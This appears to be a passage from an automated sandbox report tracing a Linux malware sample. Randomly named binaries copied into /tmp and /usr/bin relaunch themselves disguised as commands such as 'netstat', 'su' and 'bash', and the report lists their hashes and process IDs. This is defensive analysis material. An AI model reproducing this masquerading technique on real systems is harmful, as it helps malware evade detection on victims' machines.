Arguments:	/usr/bin/ldaqsdrmbu "netstat -antop" 9446
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11720, Parent PID: 11708

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11709, Parent PID: 9446

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11710, Parent PID: 11709

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11710, Parent PID: 3310

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
Arguments:	/usr/bin/ldaqsdrmbu "cat resolv.conf" 9446
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11719, Parent PID: 11710

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11711, Parent PID: 9446

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11712, Parent PID: 11711

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11712, Parent PID: 3310

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
Arguments:	/usr/bin/ldaqsdrmbu id 9446
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11716, Parent PID: 11712

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11713, Parent PID: 9446

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11714, Parent PID: 11713

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11714, Parent PID: 3310

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
Arguments:	/usr/bin/ldaqsdrmbu top 9446
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11718, Parent PID: 11714

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11715, Parent PID: 9446

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11717, Parent PID: 11715

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11717, Parent PID: 3310

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
Arguments:	/usr/bin/ldaqsdrmbu "route -n" 9446
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11722, Parent PID: 11717

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	cf6da36df699f9bdadf3a1295d7fe52d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11762, Parent PID: 9446

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11763, Parent PID: 11762

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wuipuaslsy PID: 11763, Parent PID: 3310

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	/usr/bin/wuipuaslsy su 9446
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: wuipuaslsy PID: 11773, Parent PID: 11763

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: dkuidbsedp PID: 11764, Parent PID: 9446

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11765, Parent PID: 11764

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wuipuaslsy PID: 11765, Parent PID: 3310

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	/usr/bin/wuipuaslsy pwd 9446
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: wuipuaslsy PID: 11777, Parent PID: 11765

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: dkuidbsedp PID: 11766, Parent PID: 9446

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11767, Parent PID: 11766

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wuipuaslsy PID: 11767, Parent PID: 3310

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	/usr/bin/wuipuaslsy top 9446
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: wuipuaslsy PID: 11771, Parent PID: 11767

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: dkuidbsedp PID: 11768, Parent PID: 9446

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11769, Parent PID: 11768

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wuipuaslsy PID: 11769, Parent PID: 3310

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	/usr/bin/wuipuaslsy "sleep 1" 9446
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: wuipuaslsy PID: 11774, Parent PID: 11769

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: dkuidbsedp PID: 11770, Parent PID: 9446

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11772, Parent PID: 11770

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wuipuaslsy PID: 11772, Parent PID: 3310

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	/usr/bin/wuipuaslsy "cat resolv.conf" 9446
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: wuipuaslsy PID: 11775, Parent PID: 11772

General

Start time:	09:51:50
Start date:	27/07/2022
Path:	/usr/bin/wuipuaslsy
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	da49eab2e2e3d98ad381b18c0720ad92

Chronological Activities

Analysis Process: dkuidbsedp PID: 11817, Parent PID: 9446

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11818, Parent PID: 11817

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11818, Parent PID: 3310

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	/usr/bin/uvaewfcsxa who 9446
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11824, Parent PID: 11818

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: dkuidbsedp PID: 11819, Parent PID: 9446

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11820, Parent PID: 11819

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11820, Parent PID: 3310

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	/usr/bin/uvaewfcsxa "netstat -an" 9446
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11830, Parent PID: 11820

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: dkuidbsedp PID: 11821, Parent PID: 9446

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11822, Parent PID: 11821

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11822, Parent PID: 3310

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	/usr/bin/uvaewfcsxa sh 9446
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11828, Parent PID: 11822

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: dkuidbsedp PID: 11823, Parent PID: 9446

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11825, Parent PID: 11823

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11825, Parent PID: 3310

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	/usr/bin/uvaewfcsxa whoami 9446
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11831, Parent PID: 11825

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: dkuidbsedp PID: 11826, Parent PID: 9446

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11827, Parent PID: 11826

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11827, Parent PID: 3310

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	/usr/bin/uvaewfcsxa bash 9446
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: uvaewfcsxa PID: 11834, Parent PID: 11827

General

Start time:	09:51:55
Start date:	27/07/2022
Path:	/usr/bin/uvaewfcsxa
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	052f0628948780b9e671e265706d5750

Chronological Activities

Analysis Process: dkuidbsedp PID: 11872, Parent PID: 9446

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11873, Parent PID: 11872

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: bbynnggifo PID: 11873, Parent PID: 3310

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	/usr/bin/bbynnggifo "route -n" 9446
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: bbynnggifo PID: 11891, Parent PID: 11873

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: dkuidbsedp PID: 11874, Parent PID: 9446

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11875, Parent PID: 11874

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: bbynnggifo PID: 11875, Parent PID: 3310

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	/usr/bin/bbynnggifo whoami 9446
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: bbynnggifo PID: 11894, Parent PID: 11875

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: dkuidbsedp PID: 11876, Parent PID: 9446

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11877, Parent PID: 11876

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: bbynnggifo PID: 11877, Parent PID: 3310

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	/usr/bin/bbynnggifo ifconfig 9446
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: bbynnggifo PID: 11899, Parent PID: 11877

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: dkuidbsedp PID: 11878, Parent PID: 9446

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11880, Parent PID: 11878

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: bbynnggifo PID: 11880, Parent PID: 3310

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	/usr/bin/bbynnggifo "echo \"find\"" 9446
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: bbynnggifo PID: 11885, Parent PID: 11880

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: dkuidbsedp PID: 11881, Parent PID: 9446

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11884, Parent PID: 11881

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: bbynnggifo PID: 11884, Parent PID: 3310

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	/usr/bin/bbynnggifo ifconfig 9446
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: bbynnggifo PID: 11888, Parent PID: 11884

General

Start time:	09:52:00
Start date:	27/07/2022
Path:	/usr/bin/bbynnggifo
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	a23209c49e32830c7b61347729055c82

Chronological Activities

Analysis Process: dkuidbsedp PID: 11929, Parent PID: 9446

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11930, Parent PID: 11929

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11930, Parent PID: 3310

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	/usr/bin/lcbdpulcrs "netstat -an" 9446
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11945, Parent PID: 11930

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: dkuidbsedp PID: 11931, Parent PID: 9446

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11932, Parent PID: 11931

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11932, Parent PID: 3310

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	/usr/bin/lcbdpulcrs "sleep 1" 9446
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11936, Parent PID: 11932

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: dkuidbsedp PID: 11933, Parent PID: 9446

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11934, Parent PID: 11933

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11934, Parent PID: 3310

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	/usr/bin/lcbdpulcrs who 9446
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11940, Parent PID: 11934

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: dkuidbsedp PID: 11935, Parent PID: 9446

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11938, Parent PID: 11935

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11938, Parent PID: 3310

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	/usr/bin/lcbdpulcrs ls 9446
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11942, Parent PID: 11938

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: dkuidbsedp PID: 11939, Parent PID: 9446

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11941, Parent PID: 11939

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11941, Parent PID: 3310

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	/usr/bin/lcbdpulcrs "ps -ef" 9446
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: lcbdpulcrs PID: 11952, Parent PID: 11941

General

Start time:	09:52:05
Start date:	27/07/2022
Path:	/usr/bin/lcbdpulcrs
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	944f6236abbb80bb2bff5caad0d36e00

Chronological Activities

Analysis Process: dkuidbsedp PID: 11984, Parent PID: 9446

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11985, Parent PID: 11984

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: vrbpjcuukk PID: 11985, Parent PID: 3310

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	/usr/bin/vrbpjcuukk "netstat -antop" 9446
File size:	625933 bytes
MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: vrbpjcuukk PID: 12003, Parent PID: 11985

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: dkuidbsedp PID: 11986, Parent PID: 9446

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11987, Parent PID: 11986

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: vrbpjcuukk PID: 11987, Parent PID: 3310

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	/usr/bin/vrbpjcuukk su 9446
File size:	625933 bytes
MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: vrbpjcuukk PID: 12002, Parent PID: 11987

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: dkuidbsedp PID: 11988, Parent PID: 9446

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11989, Parent PID: 11988

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: vrbpjcuukk PID: 11989, Parent PID: 3310

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	/usr/bin/vrbpjcuukk "ls -la" 9446
File size:	625933 bytes
